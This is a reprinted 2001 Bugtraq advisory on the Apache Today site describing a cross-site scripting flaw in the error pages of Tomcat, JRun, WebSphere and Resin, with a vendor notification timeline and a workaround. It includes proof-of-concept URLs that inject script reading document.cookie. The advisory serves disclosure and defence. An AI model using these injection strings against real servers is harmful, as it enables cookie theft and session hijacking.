![Apache Today [Your Apache News Source]](/pics/at_logo.png) 
 
| The Jakarta Project |
| PHP Server Side Scripting |
| Apache XML Project |
| Apache Module Registry |
| Apache-Perl Integration Project |
| The Java Apache Project |
| The Apache FAQ |
| Apache-Related Projects |
| ApacheCon |
| The Apache Software Foundation |
| Apache Project |
|
| BSD Today |
| PHPBuilder |
| Linux Today |
|
Apache Today
|
| All Linux Devices |
| Enterprise Linux Today |
| Linux Programming |
| BSD Central |
| Linux Apps |
| Linux Planet |
| Linux Central |
| Linuxnewbie.org |
| Linux Start |
| Just Linux |
| SITE DESCRIPTIONS |
|
|
Bugtraq: Java servlet cross-site scripting vulnerability
Jul 2, 2001, 16 :43 UTC (4 Talkback[s]) (6263 reads) |
Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability
=========================================================================
Affected products:
=================
Tomcat 3.2.1, 3.2.2-beta, 4.0-beta
<http://jakarta.apache.org/tomcat/>
JRun 3.0
<http://www.allaire.com/products/jrun/index.cfm>
WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional
<http://www-4.ibm.com/software/webservers/>
Resin
<http://www.caucho.com/products/resin/>
Not affected:
============
Unknown
Problem:
=======
Accessing the following URLs, the JavaScript code will be executed
in the browser on the server's domain.
Tomcat 3.2.1:
http://Tomcat/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
JRun 3.0:
http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml
http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.thtml
WebSphere 3.5 FP2:
http://WebSphere/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT>
WebSphere 3.02:
http://WebSphere/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
VisualAge for Java 3.5 Professional:
http://VisualAge-WebSphere-Test-Environment/<SCRIPT>alert(document.cookie)</SCRIPT>
Resin 1.2.2:
http://Reisin/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
http://www.caucho.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.jsp
These pages produce output like this:
=================================================
Error 404
An error has occurred while processing request:
http://WebSphere/webapp/examples/******
Message: File not found: file://******
StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: file://******
at javax.servlet.ServletException.<init>(ServletException.java:107)
at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
...
=================================================
******: The JavaScript code is executed here.
This vulnerability is quite similar to "IIS cross-site scripting
vulnerabilities (MS00-060)" reported by Microsoft on August 25, 2000.
<http://www.microsoft.com/technet/security/bulletin/ms00-060.asp>
Impact:
======
For the detail about cross-site scripting, see the following pages.
<http://www.cert.org/advisories/CA-2000-02.html>
<http://www.microsoft.com/TechNet/security/crssite.asp>
<http://www.apache.org/info/css-security/>
Vendor status:
=============
Tomcat:
======
Notified:
16 Mar 2001 04:32:02 +0900,
17 Mar 2001 18:55:45 +0900,
Response:
17 Mar 2001 20:07:42 -0000
Fix:
30 Mar 2001, Tomcat 4.0-beta-2 (maybe)
11 May 2001, Tomcat 3.2.2-beta-5 (maybe)
Announcement:
<http://jakarta.apache.org/tomcat/news.html>
Sun Microsystems does not publish Tomcat vulnerabilities.
<http://java.sun.com/products/jsp/tomcat/>
<http://java.sun.com/sfaq/chronology.html>
JRun:
====
Notified:
13 Mar 2001 23:11:54 +0900,
Response:
13 Mar 2001 09:43:49 -0500
14 Mar 2001 09:05:03 -0500
Fix:
28 Jun 2001, Patches for JRun 3.0 and JRun 2.3.3 are available.
Announcement:
<http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full>
Macromedia Product Security Bulletin (MPSB01-06)
JRun 3.1, JRun 3.0, JRun 2.3.3: Cross-site scripting vulnerability
(a.k.a. JavaScript code execution vulnerability)
WebSphere:
=========
Notified:
20 Mar 2001 08:13:30 +0900, *******@us.ibm.com
Response:
22 Mar 2001 09:14:01 -0500
23 Mar 2001 00:02:58 +0900
Fix:
PQ47386V302x (?)
<http://www-4.ibm.com/software/webservers/appserv/efix.html>
Announcement:
<http://www-6.ibm.com/jp/domino01/software/websphere.nsf/TechWeb/EC48D03C7060EAFA49256A1C0009C9F4?openDocument&&ViewName=TechWeb>
(in Japanese)
Resin:
=====
Notified:
16 Mar 2001 02:26:47 +0900, ,
Response:
None
Fix:
Unknown
Announcement:
Unknown
http://www.caucho.com/products/resin/changes.xtp
Workaround:
==========
Customize error pages.
--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://www.etl.go.jp/~takagi/
|
|
